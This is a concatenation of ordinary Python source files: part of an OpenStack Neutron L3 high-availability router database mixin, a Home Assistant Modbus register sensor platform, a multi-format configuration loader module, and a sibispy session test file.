state = sa.Column(sa.Enum('active', 'standby', name='l3_ha_states'),
default='standby',
server_default='standby')
class L3HARouterNetwork(model_base.BASEV2):
"""Host HA network for a tenant.
One HA Network is used per tenant, all HA router ports are created
on this network.
"""
__tablename__ = 'ha_router_networks'
tenant_id = sa.Column(sa.String(255), primary_key=True,
nullable=False)
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False, primary_key=True)
network = orm.relationship(models_v2.Network)
class L3HARouterVRIdAllocation(model_base.BASEV2):
"""VRID allocation per HA network.
Keep a track of the VRID allocations per HA network.
"""
__tablename__ = 'ha_router_vrid_allocations'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False, primary_key=True)
vr_id = sa.Column(sa.Integer(), nullable=False, primary_key=True)
class L3_HA_NAT_db_mixin(l3_dvr_db.L3_NAT_with_dvr_db_mixin):
"""Mixin class to add high availability capability to routers."""
extra_attributes = (
l3_dvr_db.L3_NAT_with_dvr_db_mixin.extra_attributes + [
{'name': 'ha', 'default': cfg.CONF.l3_ha},
{'name': 'ha_vr_id', 'default': 0}])
def _verify_configuration(self):
self.ha_cidr = cfg.CONF.l3_ha_net_cidr
try:
net = netaddr.IPNetwork(self.ha_cidr)
except netaddr.AddrFormatError:
raise l3_ha.HANetworkCIDRNotValid(cidr=self.ha_cidr)
if ('/' not in self.ha_cidr or net.network != net.ip):
raise l3_ha.HANetworkCIDRNotValid(cidr=self.ha_cidr)
self._check_num_agents_per_router()
def _check_num_agents_per_router(self):
max_agents = cfg.CONF.max_l3_agents_per_router
min_agents = cfg.CONF.min_l3_agents_per_router
if (max_agents != UNLIMITED_AGENTS_PER_ROUTER
and max_agents < min_agents):
raise l3_ha.HAMaximumAgentsNumberNotValid(
max_agents=max_agents, min_agents=min_agents)
if min_agents < constants.MINIMUM_AGENTS_FOR_HA:
raise l3_ha.HAMinimumAgentsNumberNotValid()
def __init__(self):
self._verify_configuration()
super(L3_HA_NAT_db_mixin, self).__init__()
def get_ha_network(self, context, tenant_id):
return (context.session.query(L3HARouterNetwork).
filter(L3HARouterNetwork.tenant_id == tenant_id).
first())
def _get_allocated_vr_id(self, context, network_id):
with context.session.begin(subtransactions=True):
query = (context.session.query(L3HARouterVRIdAllocation).
filter(L3HARouterVRIdAllocation.network_id == network_id))
allocated_vr_ids = set(a.vr_id for a in query) - set([0])
return allocated_vr_ids
def _allocate_vr_id(self, context, network_id, router_id):
for count in range(MAX_ALLOCATION_TRIES):
try:
with context.session.begin(subtransactions=True):
allocated_vr_ids = self._get_allocated_vr_id(context,
network_id)
available_vr_ids = VR_ID_RANGE - allocated_vr_ids
if not available_vr_ids:
raise l3_ha.NoVRIDAvailable(router_id=router_id)
allocation = L3HARouterVRIdAllocation()
allocation.network_id = network_id
allocation.vr_id = available_vr_ids.pop()
context.session.add(allocation)
return allocation.vr_id
except db_exc.DBDuplicateEntry:
LOG.info(_LI("Attempt %(count)s to allocate a VRID in the "
"network %(network)s for the router %(router)s"),
{'count': count, 'network': network_id,
'router': router_id})
raise l3_ha.MaxVRIDAllocationTriesReached(
network_id=network_id, router_id=router_id,
max_tries=MAX_ALLOCATION_TRIES)
def _delete_vr_id_allocation(self, context, ha_network, vr_id):
with context.session.begin(subtransactions=True):
context.session.query(L3HARouterVRIdAllocation).filter_by(
network_id=ha_network.network_id,
vr_id=vr_id).delete()
def _set_vr_id(self, context, router, ha_network):
with context.session.begin(subtransactions=True):
router.extra_attributes.ha_vr_id = self._allocate_vr_id(
context, ha_network.network_id, router.id)
def _create_ha_subnet(self, context, network_id, tenant_id):
args = {'subnet':
{'network_id': network_id,
'tenant_id': '',
'name': constants.HA_SUBNET_NAME % tenant_id,
'ip_version': 4,
'cidr': cfg.CONF.l3_ha_net_cidr,
'enable_dhcp': False,
'host_routes': attributes.ATTR_NOT_SPECIFIED,
'dns_nameservers': attributes.ATTR_NOT_SPECIFIED,
'allocation_pools': attributes.ATTR_NOT_SPECIFIED,
'gateway_ip': None}}
return self._core_plugin.create_subnet(context, args)
def _create_ha_network_tenant_binding(self, context, tenant_id,
network_id):
with context.session.begin(subtransactions=True):
ha_network = L3HARouterNetwork(tenant_id=tenant_id,
network_id=network_id)
context.session.add(ha_network)
return ha_network
def _create_ha_network(self, context, tenant_id):
admin_ctx = context.elevated()
args = {'network':
{'name': constants.HA_NETWORK_NAME % tenant_id,
'tenant_id': '',
'shared': False,
'admin_state_up': True,
'status': constants.NET_STATUS_ACTIVE}}
network = self._core_plugin.create_network(admin_ctx, args)
try:
ha_network = self._create_ha_network_tenant_binding(admin_ctx,
tenant_id,
network['id'])
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_network(admin_ctx, network['id'])
try:
self._create_ha_subnet(admin_ctx, network['id'], tenant_id)
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_network(admin_ctx, network['id'])
return ha_network
def get_number_of_agents_for_scheduling(self, context):
"""Return the number of agents on which the router will be scheduled.
Raises an exception if there are not enough agents available to honor
the min_agents config parameter. If the max_agents parameter is set to
0 all the agents will be used.
"""
min_agents = cfg.CONF.min_l3_agents_per_router
num_agents = len(self.get_l3_agents(context,
filters={'agent_modes': [constants.L3_AGENT_MODE_LEGACY,
constants.L3_AGENT_MODE_DVR_SNAT]}))
max_agents = cfg.CONF.max_l3_agents_per_router
if max_agents:
if max_agents > num_agents:
LOG.info(_LI("Number of available agents lower than "
"max_l3_agents_per_router. L3 agents "
"available: %s"), num_agents)
else:
num_agents = max_agents
if num_agents < min_agents:
raise l3_ha.HANotEnoughAvailableAgents(min_agents=min_agents,
num_agents=num_agents)
return num_agents
def _create_ha_port_binding(self, context, port_id, router_id):
with context.session.begin(subtransactions=True):
portbinding = L3HARouterAgentPortBinding(port_id=port_id,
router_id=router_id)
context.session.add(portbinding)
return portbinding
def add_ha_port(self, context, router_id, network_id, tenant_id):
port = self._core_plugin.create_port(context, {
'port':
{'tenant_id': '',
'network_id': network_id,
'fixed_ips': attributes.ATTR_NOT_SPECIFIED,
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': True,
'device_id': router_id,
'device_owner': constants.DEVICE_OWNER_ROUTER_HA_INTF,
'name': constants.HA_PORT_NAME % tenant_id}})
try:
return self._create_ha_port_binding(context, port['id'], router_id)
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_port(context, port['id'],
l3_port_check=False)
def _create_ha_interfaces(self, context, router, ha_network):
admin_ctx = context.elevated()
num_agents = self.get_number_of_agents_for_scheduling(context)
port_ids = []
try:
for index in range(num_agents):
binding = self.add_ha_port(admin_ctx, router.id,
ha_network.network['id'],
router.tenant_id)
port_ids.append(binding.port_id)
except Exception:
with excutils.save_and_reraise_exception():
for port_id in port_ids:
self._core_plugin.delete_port(admin_ctx, port_id,
l3_port_check=False)
def _delete_ha_interfaces(self, context, router_id):
admin_ctx = context.elevated()
device_filter = {'device_id': [router_id],
'device_owner':
[constants.DEVICE_OWNER_ROUTER_HA_INTF]}
ports = self._core_plugin.get_ports(admin_ctx, filters=device_filter)
for port in ports:
self._core_plugin.delete_port(admin_ctx, port['id'],
l3_port_check=False)
def _notify_ha_interfaces_updated(self, context, router_id):
self.l3_rpc_notifier.routers_updated(
context, [router_id], shuffle_agents=True)
@classmethod
def _is_ha(cls, router):
ha = router.get('ha')
if not attributes.is_attr_set(ha):
ha = cfg.CONF.l3_ha
return ha
def create_router(self, context, router):
is_ha = self._is_ha(router['router'])
if is_ha and l3_dvr_db.is_distributed_router(router['router']):
raise l3_ha.DistributedHARouterNotSupported()
router['router']['ha'] = is_ha
router_dict = super(L3_HA_NAT_db_mixin,
self).create_router(context, router)
if is_ha:
try:
router_db = self._get_router(context, router_dict['id'])
ha_network = self.get_ha_network(context,
router_db.tenant_id)
if not ha_network:
ha_network = self._create_ha_network(context,
router_db.tenant_id)
self._set_vr_id(context, router_db, ha_network)
self._create_ha_interfaces(context, router_db, ha_network)
self._notify_ha_interfaces_updated(context, router_db.id)
except Exception:
with excutils.save_and_reraise_exception():
self.delete_router(context, router_dict['id'])
router_dict['ha_vr_id'] = router_db.extra_attributes.ha_vr_id
return router_dict
def _update_router_db(self, context, router_id, data, gw_info):
ha = data.pop('ha', None)
if ha and data.get('distributed'):
raise l3_ha.DistributedHARouterNotSupported()
with context.session.begin(subtransactions=True):
router_db = super(L3_HA_NAT_db_mixin, self)._update_router_db(
context, router_id, data, gw_info)
ha_not_changed = ha is None or ha == router_db.extra_attributes.ha
if ha_not_changed:
return router_db
ha_network = self.get_ha_network(context,
router_db.tenant_id)
router_db.extra_attributes.ha = ha
if not ha:
self._delete_vr_id_allocation(
context, ha_network, router_db.extra_attributes.ha_vr_id)
router_db.extra_attributes.ha_vr_id = None
if ha:
if not ha_network:
ha_network = self._create_ha_network(context,
router_db.tenant_id)
self._set_vr_id(context, router_db, ha_network)
self._create_ha_interfaces(context, router_db, ha_network)
self._notify_ha_interfaces_updated(context, router_db.id)
else:
self._delete_ha_interfaces(context, router_db.id)
self._notify_ha_interfaces_updated(context, router_db.id)
return router_db
def update_router_state(self, context, router_id, state, host):
with context.session.begin(subtransactions=True):
bindings = self.get_ha_router_port_bindings(context, [router_id],
host)
if bindings:
if len(bindings) > 1:
LOG.warn(_LW("The router %(router_id)s is bound multiple "
"times on the agent %(host)s"),
{'router_id': router_id, 'host': host})
bindings[0].update({'state': state})
def delete_router(self, context, id):
router_db = self._get_router(context, id)
super(L3_HA_NAT_db_mixin, self).delete_router(context, id)
if router_db.extra_attributes.ha:
ha_network = self.get_ha_network(context,
router_db.tenant_id)
if ha_network:
self._delete_vr_id_allocation(
context, ha_network, router_db.extra_attributes.ha_vr_id)
self._delete_ha_interfaces(context, router_db.id)
def get_ha_router_port_bindings(self, context, router_ids, host=None):
query = context.session.query(L3HARouterAgentPortBinding)
if host:
query = query.join(agents_db.Agent).filter(
agents_db.Agent.host == host)
query = query.filter(
L3HARouterAgentPortBinding.router_id.in_(router_ids))
return query.all()
def _process_sync_ha_data(self, context, routers, host):
routers_dict = dict((router['id'], router) for router in routers)
bindings = self.get_ha_router_port_bindings(context,
routers_dict.keys(),
host)
for binding in bindings:
port_dict = self._core_plugin._make_port_dict(binding.port)
router = routers_dict.get(binding.router_id)
router[constants.HA_INTERFACE_KEY] = port_dict
router[constants.HA_ROUTER_STATE_KEY] = binding.state
for router in routers_dict.values():
interface = router.get(constants.HA_INTERFACE_KEY)
if interface:
self._populate_subnet_for_ports(context, [interface])
return routers_dict.values()
def get_ha_sync_data_for_host(self, context, host=None, router_ids=None,
active=None):
sync_data = super(L3_HA_NAT_db_mixin, self).get_sync_data(context,
router_ids,
active)
return self._process_sync_ha_data(context, sync_data, host)
|
|
"""Support for Modbus Register sensors."""
import logging
import struct
from typing import Any, Optional, Union
from pymodbus.exceptions import ConnectionException, ModbusException
from pymodbus.pdu import ExceptionResponse
import voluptuous as vol
from homeassistant.components.sensor import DEVICE_CLASSES_SCHEMA, PLATFORM_SCHEMA
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_NAME,
CONF_OFFSET,
CONF_SLAVE,
CONF_STRUCTURE,
CONF_UNIT_OF_MEASUREMENT,
)
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from .const import (
CALL_TYPE_REGISTER_HOLDING,
CALL_TYPE_REGISTER_INPUT,
CONF_COUNT,
CONF_DATA_TYPE,
CONF_HUB,
CONF_PRECISION,
CONF_REGISTER,
CONF_REGISTER_TYPE,
CONF_REGISTERS,
CONF_REVERSE_ORDER,
CONF_SCALE,
DATA_TYPE_CUSTOM,
DATA_TYPE_FLOAT,
DATA_TYPE_INT,
DATA_TYPE_STRING,
DATA_TYPE_UINT,
DEFAULT_HUB,
MODBUS_DOMAIN,
)
_LOGGER = logging.getLogger(__name__)
def number(value: Any) -> Union[int, float]:
"""Coerce a value to number without losing precision."""
if isinstance(value, int):
return value
if isinstance(value, str):
try:
value = int(value)
return value
except (TypeError, ValueError):
pass
try:
value = float(value)
return value
except (TypeError, ValueError):
raise vol.Invalid(f"invalid number {value}")
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_REGISTERS): [
{
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_REGISTER): cv.positive_int,
vol.Optional(CONF_COUNT, default=1): cv.positive_int,
vol.Optional(CONF_DATA_TYPE, default=DATA_TYPE_INT): vol.In(
[
DATA_TYPE_INT,
DATA_TYPE_UINT,
DATA_TYPE_FLOAT,
DATA_TYPE_STRING,
DATA_TYPE_CUSTOM,
]
),
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_HUB, default=DEFAULT_HUB): cv.string,
vol.Optional(CONF_OFFSET, default=0): number,
vol.Optional(CONF_PRECISION, default=0): cv.positive_int,
vol.Optional(
CONF_REGISTER_TYPE, default=CALL_TYPE_REGISTER_HOLDING
): vol.In([CALL_TYPE_REGISTER_HOLDING, CALL_TYPE_REGISTER_INPUT]),
vol.Optional(CONF_REVERSE_ORDER, default=False): cv.boolean,
vol.Optional(CONF_SCALE, default=1): number,
vol.Optional(CONF_SLAVE): cv.positive_int,
vol.Optional(CONF_STRUCTURE): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
}
]
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Modbus sensors."""
sensors = []
data_types = {
DATA_TYPE_INT: {1: "h", 2: "i", 4: "q"},
DATA_TYPE_UINT: {1: "H", 2: "I", 4: "Q"},
DATA_TYPE_FLOAT: {1: "e", 2: "f", 4: "d"},
}
for register in config[CONF_REGISTERS]:
structure = ">i"
if register[CONF_DATA_TYPE] == DATA_TYPE_STRING:
structure = str(register[CONF_COUNT] * 2) + "s"
elif register[CONF_DATA_TYPE] != DATA_TYPE_CUSTOM:
try:
structure = (
f">{data_types[register[CONF_DATA_TYPE]][register[CONF_COUNT]]}"
)
except KeyError:
_LOGGER.error(
"Unable to detect data type for %s sensor, try a custom type",
register[CONF_NAME],
)
continue
else:
structure = register.get(CONF_STRUCTURE)
try:
size = struct.calcsize(structure)
except struct.error as err:
_LOGGER.error("Error in sensor %s structure: %s", register[CONF_NAME], err)
continue
if register[CONF_COUNT] * 2 != size:
_LOGGER.error(
"Structure size (%d bytes) mismatch registers count (%d words)",
size,
register[CONF_COUNT],
)
continue
hub_name = register[CONF_HUB]
hub = hass.data[MODBUS_DOMAIN][hub_name]
sensors.append(
ModbusRegisterSensor(
hub,
register[CONF_NAME],
register.get(CONF_SLAVE),
register[CONF_REGISTER],
register[CONF_REGISTER_TYPE],
register.get(CONF_UNIT_OF_MEASUREMENT),
register[CONF_COUNT],
register[CONF_REVERSE_ORDER],
register[CONF_SCALE],
register[CONF_OFFSET],
structure,
register[CONF_PRECISION],
register[CONF_DATA_TYPE],
register.get(CONF_DEVICE_CLASS),
)
)
if not sensors:
return False
add_entities(sensors)
class ModbusRegisterSensor(RestoreEntity):
"""Modbus register sensor."""
def __init__(
self,
hub,
name,
slave,
register,
register_type,
unit_of_measurement,
count,
reverse_order,
scale,
offset,
structure,
precision,
data_type,
device_class,
):
"""Initialize the modbus register sensor."""
self._hub = hub
self._name = name
self._slave = int(slave) if slave else None
self._register = int(register)
self._register_type = register_type
self._unit_of_measurement = unit_of_measurement
self._count = int(count)
self._reverse_order = reverse_order
self._scale = scale
self._offset = offset
self._precision = precision
self._structure = structure
self._data_type = data_type
self._device_class = device_class
self._value = None
self._available = True
async def async_added_to_hass(self):
"""Handle entity which will be added."""
state = await self.async_get_last_state()
if not state:
return
self._value = state.state
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def device_class(self) -> Optional[str]:
"""Return the device class of the sensor."""
return self._device_class
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
def update(self):
"""Update the state of the sensor."""
try:
if self._register_type == CALL_TYPE_REGISTER_INPUT:
result = self._hub.read_input_registers(
self._slave, self._register, self._count
)
else:
result = self._hub.read_holding_registers(
self._slave, self._register, self._count
)
except ConnectionException:
self._available = False
return
if isinstance(result, (ModbusException, ExceptionResponse)):
self._available = False
return
registers = result.registers
if self._reverse_order:
registers.reverse()
byte_string = b"".join([x.to_bytes(2, byteorder="big") for x in registers])
if self._data_type != DATA_TYPE_STRING:
val = struct.unpack(self._structure, byte_string)[0]
val = self._scale * val + self._offset
if isinstance(val, int):
self._value = str(val)
if self._precision > 0:
self._value += "." + "0" * self._precision
else:
self._value = f"{val:.{self._precision}f}"
else:
self._value = byte_string.decode()
self._available = True
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from collections.abc import MutableMapping
"""
Module for reading and writing the configuration.
USAGE:
configuration.get_configuration([location], [source_type], [file_type], [**kwargs]):
location: file name with path
source_type: see below
file_type: see below
kwargs: extra parameters (depends on the source_type)
It supports different source types:
file: local file.
web: file on the web (e.g. http)
It supports different file types:
json (based on the json module)
xml (using xmltodict by Martin Blech)
yaml (using pyyaml by pyyaml.org)
cfg (based on the configparser module)
"""
class Configuration(MutableMapping):
"""
Dict like class containing the configuration.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the dictionary the same as a real dict.
"""
self.store = dict()
if args or kwargs:
self.update(dict(*args, **kwargs))
def __getitem__(self, key):
"""
Get an item form the configuration dict.
"""
return self.store[self.__keytransform__(key)]
def __setitem__(self, key, value):
"""
Set an item in the configuration dict.
"""
self.store[self.__keytransform__(key)] = value
def __delitem__(self, key):
"""
Remove an item from the configuration dict.
"""
del self.store[self.__keytransform__(key)]
def __iter__(self):
"""
Return the iterator of the dictonary.
"""
return iter(self.store)
def __len__(self):
"""
Return the lenght of the dictionary.
"""
return len(self.store)
def __keytransform__(self, key):
"""
Transforms the key.
"""
return key
# -- We want it to output like a dict --
def __repr__(self):
"""
Represent itself as a dict.
"""
return self.store.__repr__()
# -- Configuration specific methods: load, save & close. --
def load(self):
"""
Reloads the configuration - does nothing in Configuration.
Normally only called once, usually by __enter__ if you're using the with statement.
"""
pass
def save(self):
"""
Call this when wanting to do an explicit save of the configuration.
It can be called multiple times in the live time of the object.
It must raise a NotImplementedError if this is not supported for your
type of configuration.
"""
raise NotImplementedError("Save is not implemented on ")
def close(self):
"""
Always call this after you've done with a configuration.
Here it is just a place holder for subclasses that need to clean up
after itself.
"""
pass
# -- Contect manager --
def __enter__(self):
"""
Implementing it as a context manager: loading the configuration.
"""
self.load()
return self
def __exit__(self, *args):
"""
Implementing it as a context manager: call close.
"""
self.close()
class SplitConfiguration(Configuration):
"""
Receives a list of Configuration instances where the extra ones are backups.
The first configuration instance in the list is the main one and the only
one that is used for writing the configuration. If it can't be loaded the
first backup will be loaded (and so on) and that configuration is
immediately saved to the main configuration.
After the initial load this behaves just like there is only the main
configuration instance. Actually, if the main configuration is good the
backups are never used.
"""
def __init__(self, configurations):
"""
Initializes a split configuration from different configurations.
"""
super().__init__()
self.main = None
backup = []
for config in configurations:
# First one is the main one.
if self.main is None:
self.main = config
else:
backup.append(config)
if len(backup) == 0:
self.backup = None
elif len(backup) == 1:
self.backup = backup[0]
else:
self.backup = SplitConfiguration(backup)
def load(self):
"""
Load the configuration: first try the main.
"""
try:
# Try to load the main configuration.
self.main.load()
except:
# That didn't work, so trying the backup.
if self.backup is not None:
# Loading from the backup and saving it to the main configuration.
self.backup.load()
self.main.update(self.backup)
self.main.save()
else:
# No backup, re-raising the original exception.
raise
def save(self):
"""
Save the configuration: always to the main.
"""
self.main.save()
def __enter__(self):
"""
Return the context manager of the main.
"""
self.load()
# Once the initial load is done, only the main configuration matters.
return self.main
def __getitem__(self, key):
"""
Get the item.
"""
return self.main.__getitem__(key)
def __setitem__(self, key, value):
"""
Set the item.
"""
return self.main.__setitem__(key, value)
def __delitem__(self, key):
"""
Remove the item.
"""
return self.main.__del__(key)
def __len__(self):
"""
Return the lenght.
"""
return self.main.__len__()
def __repr__(self):
"""
Represent as the main.
"""
return self.main.__repr__()
def clear(self):
"""
Clear the main.
"""
return self.main.clear()
def copy(self):
"""
Returns a copy
"""
return self.main.copy()
def has_key(self, key):
return self.main.has_key(key) # noqa
def pop(self, key, d=None):
return self.main.pop(key, d)
def update(self, *args, **kwargs):
return self.main.update(*args, **kwargs)
def keys(self):
return self.main.keys()
def values(self):
return self.main.values()
def items(self):
return self.main.items()
def pop(self, *args):
return self.main.pop(*args)
def __cmp__(self, item):
return self.main.__cmp__(item)
def __contains__(self, item):
return self.main.__contains__(item)
def __iter__(self):
return self.main.__iter__()
def __unicode__(self):
return self.main.__unicode__()
class ConfigurationParser:
"""
Dummy root of all configuration parser classes.
"""
def __init__(self, location, **options):
"""
Initialize with a location.
"""
self.location = location
self.options = options
@staticmethod
def infer_type(value):
if value is None:
return {}
try:
value = int(value)
except:
try:
value = float(value)
except:
pass
return value
def load_into_dict(self, configuration):
"""
Must be overwritten in the subclass.
"""
if isinstance(self, ConfigurationParser):
raise NotImplementedError("ConfigurationParser is a dummy.")
else:
raise NotImplementedError(
"Load is not implemented in %s." % (self.__class__.__name__)
)
def save_from_dict(self, configuration):
"""
Must be overwritten in the subclass.
"""
if isinstance(self, ConfigurationParser):
raise NotImplementedError("ConfigurationParser is a dummy.")
else:
raise NotImplementedError(
"Save is not implemented in %s." % (self.__class__.__name__)
)
def __str__(self):
"""
String representation of the parser.
"""
return super().__str__() + " on location %s" % (self.location)
class JsonConfigurationParser(ConfigurationParser):
"""
Parses a json file.
"""
def load_into_dict(self, configuration):
"""
Parsing a json file and updating the configuration.
"""
import json
json_conf = None
with open(self.location, encoding="utf-8") as data_file:
json_conf = json.load(data_file)
configuration.update(json_conf)
def save_from_dict(self, configuration):
"""
Saving the configuration again.
"""
import json
with open(self.location, "w", encoding="utf-8") as data_file:
json.dump(
dict(configuration),
data_file,
sort_keys=True,
indent=4,
separators=(",", ": "),
)
class YamlConfigurationParser(ConfigurationParser):
"""
Parses a yaml file.
"""
def load_into_dict(self, configuration):
"""
Parsing a yaml file and updating the configuration.
"""
import yaml
configuration.update(
yaml.load(
open(self.location, "r", encoding="utf-8"), Loader=yaml.SafeLoader
)
)
def save_from_dict(self, configuration):
"""
Saving the configuration again to the yaml.
"""
import yaml
yaml.dump(dict(configuration), open(self.location, "w", encoding="utf-8"))
class XmlConfigurationParser(ConfigurationParser):
"""
Parses an XML file.
"""
def load_into_dict(self, configuration):
"""
Parsing an xml file and updating the configuration.
"""
import xmltodict
configuration.update(
xmltodict.parse(
open(self.location, "rb"),
encoding="utf-8",
postprocessor=lambda path, key, value: (
key,
ConfigurationParser.infer_type(value),
),
)["suapp"]
)
def save_from_dict(self, configuration):
"""
Saving the configuration again to xml.
"""
import xmltodict
xmltodict.unparse(
{"suapp": dict(configuration)},
open(self.location, "wb"),
encoding="utf-8",
pretty=True,
)
class CfgConfigurationParser(ConfigurationParser):
"""
Parses a configuration in the configparser format.
"""
def configuration_to_flat_dict(self, configuration, prefix=None):
"""
Flattens the configuration from multiple levels to one.
From:
{"a": {"b": {"c": "value"}}}
To:
{"a.b.c": "value"}
"""
if not prefix:
prefix = []
config_flat = dict()
for key, value in configuration.items():
new_prefix = list(prefix)
new_prefix.append(key)
if type(value) == type(config_flat):
new_prefix = list(prefix)
new_prefix.append(key)
config_flat.update(
self.configuration_to_flat_dict(value, prefix=new_prefix)
)
else:
config_flat[".".join(new_prefix)] = value
if not config_flat:
# Nothing put into it, so creating an empty dummy sub prefix entry.
config_flat[".".join(prefix) + "."] = ""
return config_flat
def configuration_to_configparser(self, configuration):
"""
Converts the configuration to a configuration for configparser.
From:
{"a": {"b": {"c": "value"}}}
To:
[a.b]
c = value
"""
import configparser
config_parser = configparser.RawConfigParser()
config_flat = self.configuration_to_flat_dict(configuration)
for fullkey, value in config_flat.items():
try:
(section, key) = fullkey.rsplit(".", 1)
except ValueError:
section = ""
key = fullkey
try:
if section != "":
config_parser.add_section(section)
except configparser.DuplicateSectionError:
# Ignore
pass
if key:
config_parser.set(section, key, value)
return config_parser
def load_into_dict(self, configuration):
"""
Reads in the config file.
"""
import configparser
config = configparser.ConfigParser()
config.read_file(open(self.location, encoding="utf-8"))
defaults = config.defaults()
for key, value in defaults.items():
configuration[key] = ConfigurationParser.infer_type(value)
for section in config.sections():
section_path = section.split(".")
current = configuration
for step in section_path:
if step not in current:
current[step] = {}
current = current[step]
for key in config.options(section):
raw = self.options.get("raw", True)
value = config.get(section, key, raw=raw)
if self.options.get("sparse", True):
if key in defaults:
if defaults[key] == value:
continue
current[key] = ConfigurationParser.infer_type(value)
def save_from_dict(self, configuration):
"""
Saves the configuration to a config file.
It uses the write function on the configparser that needs the file handle.
"""
config_parser = self.configuration_to_configparser(configuration)
with open(self.location, "w", encoding="utf-8") as config_parser_file_handle:
config_parser.write(config_parser_file_handle)
def get_configuration_parser(location, file_type, **options):
"""
Returns the parser based on the file type.
"""
if file_type == "json":
return JsonConfigurationParser(location, **options)
elif file_type == "cfg":
return CfgConfigurationParser(location, **options)
elif file_type == "xml":
return XmlConfigurationParser(location, **options)
elif file_type == "yaml":
return YamlConfigurationParser(location, **options)
else:
raise NotImplementedError("Unknown file type to parse: %s." % (file_type))
class FileConfiguration(Configuration):
"""
Loads and saves the configuration from the file system.
"""
def __init__(self, location, file_type=None, **options):
"""
Initializing the parser depending on the file type.
"""
super().__init__()
# Trying to infer the file type if not given.
if not file_type:
if location.lower().endswith(".json"):
file_type = "json"
elif location.lower().endswith(".xml"):
file_type = "xml"
elif location.lower().endswith(".cfg"):
file_type = "cfg"
elif location.lower().endswith(".ini"):
file_type = "cfg"
elif location.lower().endswith(".yml"):
file_type = "yaml"
elif location.lower().endswith(".yaml"):
file_type = "yaml"
else:
file_type = "???"
# Based on the file type.
self.parser = get_configuration_parser(location, file_type, **options)
def load(self):
"""
Have the parser read in the configuration.
"""
self.parser.load_into_dict(self)
def save(self):
"""
Have the parser write out the configuration.
"""
self.parser.save_from_dict(self)
class WebConfiguration(Configuration):
"""
Loads the configuration from the web.
"""
def __init__(self, url, **options):
"""
Initializes with an url
"""
super().__init__()
self.url = url
self.options = options
def load(self):
"""
Downloading the web resource to a temporary file and reading it in.
"""
import os
import shutil
import tempfile
import urllib.request
file_type = None
file_type = self.url.rsplit(".", 1)[1]
if "/" in file_type:
# The URL doesn't seem to contain file at the end so this was wrong.
file_type = None
file_name = None
try:
# Download the file from `url` and save it locally under `file_name`:
(os_level_handle, file_name) = tempfile.mkstemp(suffix=".%s" % (file_type))
os.close(os_level_handle)
with urllib.request.urlopen(self.url) as response, open(
file_name, "wb"
) as out_file:
shutil.copyfileobj(response, out_file)
# Using FileConfiguration on the temporary file to do the real stuff.
file_conf = FileConfiguration(file_name, file_type, **self.options)
file_conf.load()
self.update(file_conf)
except:
# Re-raising.
raise
finally:
try:
# Always try to delete the temporary file.
os.remove(file_name)
except:
pass
def save(self):
"""
Saving of the configuration on a WebCOnfiguration is not supported.
TODO EXTRA: we could try to do a HTTP PUT or stuff similar.
"""
raise NotImplementedError("Save is not implemented on WebConfiguration.")
def get_configuration(location=None, source_type=None, file_type=None, **kwargs):
"""
Returns the configuration object for the location.
Possible source types are: http, file. If not specified it tries
to infer the type if it is 'http' and else defaults to 'file'.
The file type is only used when the source type is 'file'.
"""
# Inferring source type if not given.
if not source_type:
if not location:
return Configuration(**kwargs)
elif isinstance(location, dict):
return Configuration(**location)
elif isinstance(location, list):
configuration_list = []
for sub_location in location:
if isinstance(sub_location, Configuration):
configuration_list.append(sub_location)
else:
configuration_list.append(
get_configuration(location=sub_location, **kwargs)
)
return SplitConfiguration(configuration_list)
elif location.lower().startswith("http://"):
source_type = "http"
elif location.lower().startswith("https://"):
source_type = "http"
else:
source_type = "file"
# Getting the correct Configuration object.
if source_type == "http":
return WebConfiguration(location, **kwargs)
elif source_type == "file":
return FileConfiguration(location, file_type=file_type, **kwargs)
else:
raise IOError("Unknown source type %s." % (source_type))
|
|
#!/usr/bin/env python
##
## Copyright 2016 SRI International
## See COPYING file distributed along with the package for the copyright and license terms
##
# if test script is run with argument then it will run script with the sibis config file defined by that argument
# for example test_session.py ~/.sibis-general-config.yml
# otherwise will run with data/.sibis-general-config.yml
from __future__ import absolute_import
from __future__ import print_function
from builtins import str
import os
import pytest
import shutil
import tempfile
import warnings
from sibispy import session as sess
from . import utils
@pytest.fixture
def session(config_file):
'''
Return a sibispy.Session configured by the provided config_file fixture.
'''
return utils.get_session(config_file)
@pytest.fixture
def slog():
'''
Return a sibislogger instance initialized for a test session.
'''
from sibispy import sibislogger as slog
timeLogFile = '/tmp/test_session-time_log.csv'
if os.path.isfile(timeLogFile) :
os.remove(timeLogFile)
slog.init_log(False, False,'test_session', 'test_session','/tmp')
return slog
@pytest.fixture
def sys_file_parser(session):
# Load in test specific settings :
(parser,err_msg) = session.get_config_test_parser()
assert err_msg is None, "Error: session.get_config_test_parser:" + err_msg
return parser
@pytest.fixture
def config_test_data(sys_file_parser):
config_test_data = sys_file_parser.get_category('test_session')
if not config_test_data :
warnings.warn(UserWarning("Warning: test_session specific settings not defined!"))
config_test_data = dict()
return config_test_data
#
# short sample script
#
def test_short_sample_script(special_opts):
if 'sample_session' != special_opts :
pytest.skip("Test not enabled.")
import sibispy
from sibispy import sibislogger as slog
slog.init_log(False, False,'test_session', 'test_session','/tmp')
session = sibispy.Session()
session.configure()
server = session.connect_server('data_entry', True)
assert server != None, "server should not be None"
def test_config_test_parser(session):
parser, error = session.get_config_test_parser()
assert error == None, "There should not be an error: {}".format(error)
